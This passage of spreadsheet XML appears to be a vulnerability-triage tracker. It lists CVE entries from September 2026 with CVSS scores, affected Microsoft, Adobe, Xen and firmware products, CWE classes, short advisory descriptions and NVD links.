microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L236" s="5" t="inlineStr" /><c r="M236" s="5" t="inlineStr" /><c r="N236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P236" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q236" s="5" t="inlineStr" /><c r="R236" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S236" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t></is></c></row><row r="237"><c r="A237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C237" s="5" t="inlineStr"><is><t>CVE-2026-78524</t></is></c><c r="D237" s="5" t="n"><v>8.800000000000001</v></c><c r="E237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F237" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G237" s="5" t="inlineStr" /><c r="H237" s="5" t="n"><v>0.008</v></c><c r="I237" s="5" t="inlineStr" /><c r="J237" s="5" t="inlineStr" /><c r="K237" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L237" s="5" t="inlineStr" /><c r="M237" s="5" t="inlineStr" /><c r="N237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P237" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q237" s="5" t="inlineStr" /><c r="R237" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S237" s="5" t="inlineStr"><is><t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t></is></c></row><row r="238"><c r="A238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C238" s="5" t="inlineStr"><is><t>CVE-2026-78525</t></is></c><c r="D238" s="5" t="n"><v>8.800000000000001</v></c><c r="E238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F238" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G238" s="5" t="inlineStr" /><c r="H238" s="5" t="n"><v>0.008</v></c><c r="I238" s="5" t="inlineStr" /><c r="J238" s="5" t="inlineStr" /><c r="K238" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L238" s="5" t="inlineStr" /><c r="M238" s="5" t="inlineStr" /><c r="N238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P238" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q238" s="5" t="inlineStr" /><c r="R238" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S238" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t></is></c></row><row r="239"><c r="A239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C239" s="5" t="inlineStr"><is><t>CVE-2026-78526</t></is></c><c r="D239" s="5" t="n"><v>8.800000000000001</v></c><c r="E239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F239" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G239" s="5" t="inlineStr" /><c r="H239" s="5" t="n"><v>0.006</v></c><c r="I239" s="5" t="inlineStr" /><c r="J239" s="5" t="inlineStr" /><c r="K239" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L239" s="5" t="inlineStr" /><c r="M239" s="5" t="inlineStr" /><c r="N239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q239" s="5" t="inlineStr" /><c r="R239" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S239" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t></is></c></row><row r="240"><c r="A240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C240" s="5" t="inlineStr"><is><t>CVE-2026-78834</t></is></c><c r="D240" s="5" t="n"><v>8.800000000000001</v></c><c r="E240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F240" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G240" s="5" t="inlineStr" /><c r="H240" s="5" t="n"><v>0.005</v></c><c r="I240" s="5" t="inlineStr" /><c r="J240" s="5" t="inlineStr" /><c r="K240" s="5" t="inlineStr" /><c r="L240" s="5" t="inlineStr" /><c r="M240" s="5" t="inlineStr" /><c r="N240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P240" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q240" s="5" t="inlineStr" /><c r="R240" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S240" s="5" t="inlineStr"><is><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is></c><c r="T240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t></is></c></row><row r="241"><c r="A241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C241" s="5" t="inlineStr"><is><t>CVE-2026-79376</t></is></c><c r="D241" s="5" t="n"><v>8.800000000000001</v></c><c r="E241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F241" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G241" s="5" t="inlineStr" /><c r="H241" s="5" t="n"><v>0.002</v></c><c r="I241" s="5" t="inlineStr" /><c r="J241" s="5" t="inlineStr" /><c r="K241" s="5" t="inlineStr" /><c r="L241" s="5" t="inlineStr" /><c r="M241" s="5" t="inlineStr" /><c r="N241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P241" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q241" s="5" t="inlineStr" /><c r="R241" s="5" t="inlineStr"><is><t>CWE-1284, CWE-20</t></is></c><c r="S241" s="5" t="inlineStr"><is><t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t></is></c></row><row r="242"><c r="A242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C242" s="5" t="inlineStr"><is><t>CVE-2026-79602</t></is></c><c r="D242" s="5" t="n"><v>8.800000000000001</v></c><c r="E242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G242" s="5" t="inlineStr" /><c r="H242" s="5" t="n"><v>0.001</v></c><c r="I242" s="5" t="inlineStr" /><c r="J242" s="5" t="inlineStr" /><c r="K242" s="5" t="inlineStr" /><c r="L242" s="5" t="inlineStr" /><c r="M242" s="5" t="inlineStr" /><c r="N242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P242" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q242" s="5" t="inlineStr" /><c r="R242" s="5" t="inlineStr"><is><t>CWE-119</t></is></c><c r="S242" s="5" t="inlineStr"><is><t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t></is></c><c r="T242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t></is></c></row><row r="243"><c r="A243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C243" s="5" t="inlineStr"><is><t>CVE-2026-80074</t></is></c><c r="D243" s="5" t="n"><v>8.800000000000001</v></c><c r="E243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G243" s="5" t="inlineStr" /><c r="H243" s="5" t="n"><v>0.006</v></c><c r="I243" s="5" t="inlineStr" /><c r="J243" s="5" t="inlineStr" /><c r="K243" s="5" t="inlineStr" /><c r="L243" s="5" t="inlineStr" /><c r="M243" s="5" t="inlineStr" /><c r="N243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P243" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q243" s="5" t="inlineStr" /><c r="R243" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S243" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t></is></c></row><row r="244"><c r="A244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C244" s="5" t="inlineStr"><is><t>CVE-2026-80077</t></is></c><c r="D244" s="5" t="n"><v>8.800000000000001</v></c><c r="E244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G244" s="5" t="inlineStr" /><c r="H244" s="5" t="n"><v>0.006</v></c><c r="I244" s="5" t="inlineStr" /><c r="J244" s="5" t="inlineStr" /><c r="K244" s="5" t="inlineStr" /><c r="L244" s="5" t="inlineStr" /><c r="M244" s="5" t="inlineStr" /><c r="N244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P244" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q244" s="5" t="inlineStr" /><c r="R244" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S244" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t></is></c></row><row r="245"><c r="A245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C245" s="5" t="inlineStr"><is><t>CVE-2026-80080</t></is></c><c r="D245" s="5" t="n"><v>8.800000000000001</v></c><c r="E245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G245" s="5" t="inlineStr" /><c r="H245" s="5" t="n"><v>0.006</v></c><c r="I245" s="5" t="inlineStr" /><c r="J245" s="5" t="inlineStr" /><c r="K245" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L245" s="5" t="inlineStr" /><c r="M245" s="5" t="inlineStr" /><c r="N245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P245" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q245" s="5" t="inlineStr" /><c r="R245" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S245" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t></is></c></row><row r="246"><c r="A246" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C246" s="5" t="inlineStr"><is><t>CVE-2026-80081</t></is></c><c r="D246" s="5" t="n"><v>8.800000000000001</v></c><c r="E246" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G246" s="5" t="inlineStr" /><c r="H246" s="5" t="n"><v>0.005</v></c><c r="I246" s="5" t="inlineStr" /><c r="J246" s="5" t="inlineStr" /><c r="K246" s="5" t="inlineStr"><is><t>microsoft:365_apps</t></is></c><c r="L246" s="5" t="inlineStr" /><c r="M246" s="5" t="inlineStr" /><c r="N246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P246" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q246" s="5" t="inlineStr" /><c r="R246" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S246" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80081</t></is></c></row><row r="247"><c r="A247" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C247" s="5" t="inlineStr"><is><t>CVE-2026-80083</t></is></c><c r="D247" s="5" t="n"><v>8.800000000000001</v></c><c r="E247" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G247" s="5" t="inlineStr" /><c r="H247" s="5" t="n"><v>0.002</v></c><c r="I247" s="5" t="inlineStr" /><c r="J247" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K247" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L247" s="5" t="inlineStr" /><c r="M247" s="5" t="inlineStr" /><c r="N247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P247" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q247" s="5" t="inlineStr" /><c r="R247" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="S247" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Windows Hyper-V allows an authorized attacker to execute code locally.</t></is></c><c r="T247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80083</t></is></c></row><row r="248"><c r="A248" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C248" s="5" t="inlineStr"><is><t>CVE-2026-80085</t></is></c><c r="D248" s="5" t="n"><v>8.800000000000001</v></c><c r="E248" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G248" s="5" t="inlineStr" /><c r="H248" s="5" t="n"><v>0.005</v></c><c r="I248" s="5" t="inlineStr" /><c r="J248" s="5" t="inlineStr" /><c r="K248" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L248" s="5" t="inlineStr" /><c r="M248" s="5" t="inlineStr" /><c r="N248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P248" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q248" s="5" t="inlineStr" /><c r="R248" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S248" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80085</t></is></c></row><row r="249"><c r="A249" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C249" s="5" t="inlineStr"><is><t>CVE-2026-80096</t></is></c><c r="D249" s="5" t="n"><v>8.800000000000001</v></c><c r="E249" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G249" s="5" t="inlineStr" /><c r="H249" s="5" t="n"><v>0.007</v></c><c r="I249" s="5" t="inlineStr" /><c r="J249" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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49" s="5" t="inlineStr" /><c r="M249" s="5" t="inlineStr" /><c r="N249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P249" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q249" s="5" t="inlineStr" /><c r="R249" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S249" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80096</t></is></c></row><row r="250"><c r="A250" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C250" s="5" t="inlineStr"><is><t>CVE-2026-81352</t></is></c><c r="D250" s="5" t="n"><v>8.800000000000001</v></c><c r="E250" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G250" s="5" t="inlineStr" /><c r="H250" s="5" t="n"><v>0.005</v></c><c r="I250" s="5" t="inlineStr" /><c r="J250" s="5" t="inlineStr" /><c r="K250" s="5" t="inlineStr" /><c r="L250" s="5" t="inlineStr" /><c r="M250" s="5" t="inlineStr" /><c r="N250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P250" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q250" s="5" t="inlineStr" /><c r="R250" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S250" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t></is></c></row><row r="251"><c r="A251" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C251" s="5" t="inlineStr"><is><t>CVE-2026-81385</t></is></c><c r="D251" s="5" t="n"><v>8.800000000000001</v></c><c r="E251" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G251" s="5" t="inlineStr" /><c r="H251" s="5" t="n"><v>0.01</v></c><c r="I251" s="5" t="inlineStr" /><c r="J251" s="5" t="inlineStr" /><c r="K251" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L251" s="5" t="inlineStr" /><c r="M251" s="5" t="inlineStr" /><c r="N251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P251" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q251" s="5" t="inlineStr" /><c r="R251" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S251" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t></is></c></row><row r="252"><c r="A252" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C252" s="5" t="inlineStr"><is><t>CVE-2026-81952</t></is></c><c r="D252" s="5" t="n"><v>8.800000000000001</v></c><c r="E252" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G252" s="5" t="inlineStr" /><c r="H252" s="5" t="n"><v>0.006</v></c><c r="I252" s="5" t="inlineStr" /><c r="J252" s="5" t="inlineStr" /><c r="K252" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L252" s="5" t="inlineStr" /><c r="M252" s="5" t="inlineStr" /><c r="N252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P252" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q252" s="5" t="inlineStr" /><c r="R252" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S252" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t></is></c></row><row r="253"><c r="A253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C253" s="5" t="inlineStr"><is><t>CVE-2026-81955</t></is></c><c r="D253" s="5" t="n"><v>8.800000000000001</v></c><c r="E253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G253" s="5" t="inlineStr" /><c r="H253" s="5" t="n"><v>0.006</v></c><c r="I253" s="5" t="inlineStr" /><c r="J253" s="5" t="inlineStr" /><c r="K253" s="5" t="inlineStr" /><c r="L253" s="5" t="inlineStr" /><c r="M253" s="5" t="inlineStr" /><c r="N253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P253" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q253" s="5" t="inlineStr" /><c r="R253" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S253" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t></is></c></row><row r="254"><c r="A254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C254" s="5" t="inlineStr"><is><t>CVE-2026-81996</t></is></c><c r="D254" s="5" t="n"><v>8.800000000000001</v></c><c r="E254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F254" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G254" s="5" t="inlineStr" /><c r="H254" s="5" t="n"><v>0.001</v></c><c r="I254" s="5" t="inlineStr" /><c r="J254" s="5" t="inlineStr" /><c r="K254" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L254" s="5" t="inlineStr" /><c r="M254" s="5" t="inlineStr" /><c r="N254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P254" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q254" s="5" t="inlineStr" /><c r="R254" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S254" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t></is></c></row><row r="255"><c r="A255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C255" s="5" t="inlineStr"><is><t>CVE-2026-82536</t></is></c><c r="D255" s="5" t="n"><v>8.800000000000001</v></c><c r="E255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G255" s="5" t="inlineStr" /><c r="H255" s="5" t="n"><v>0.003</v></c><c r="I255" s="5" t="inlineStr" /><c r="J255" s="5" t="inlineStr" /><c r="K255" s="5" t="inlineStr" /><c r="L255" s="5" t="inlineStr" /><c r="M255" s="5" t="inlineStr" /><c r="N255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q255" s="5" t="inlineStr" /><c r="R255" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S255" s="5" t="inlineStr"><is><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is></c><c r="T255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t></is></c></row><row r="256"><c r="A256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C256" s="5" t="inlineStr"><is><t>CVE-2026-83941</t></is></c><c r="D256" s="5" t="n"><v>8.800000000000001</v></c><c r="E256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G256" s="5" t="inlineStr" /><c r="H256" s="5" t="n"><v>0.007</v></c><c r="I256" s="5" t="inlineStr" /><c r="J256" s="5" t="inlineStr" /><c r="K256" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L256" s="5" t="inlineStr" /><c r="M256" s="5" t="inlineStr" /><c r="N256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P256" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q256" s="5" t="inlineStr" /><c r="R256" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S256" s="5" t="inlineStr"><is><t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t></is></c></row><row r="257"><c r="A257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C257" s="5" t="inlineStr"><is><t>CVE-2026-83992</t></is></c><c r="D257" s="5" t="n"><v>8.800000000000001</v></c><c r="E257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G257" s="5" t="inlineStr" /><c r="H257" s="5" t="n"><v>0.006</v></c><c r="I257" s="5" t="inlineStr" /><c r="J257" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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7" s="5" t="inlineStr" /><c r="M257" s="5" t="inlineStr" /><c r="N257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P257" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q257" s="5" t="inlineStr" /><c r="R257" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S257" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t></is></c></row><row r="258"><c r="A258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C258" s="5" t="inlineStr"><is><t>CVE-2026-83996</t></is></c><c r="D258" s="5" t="n"><v>8.800000000000001</v></c><c r="E258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c 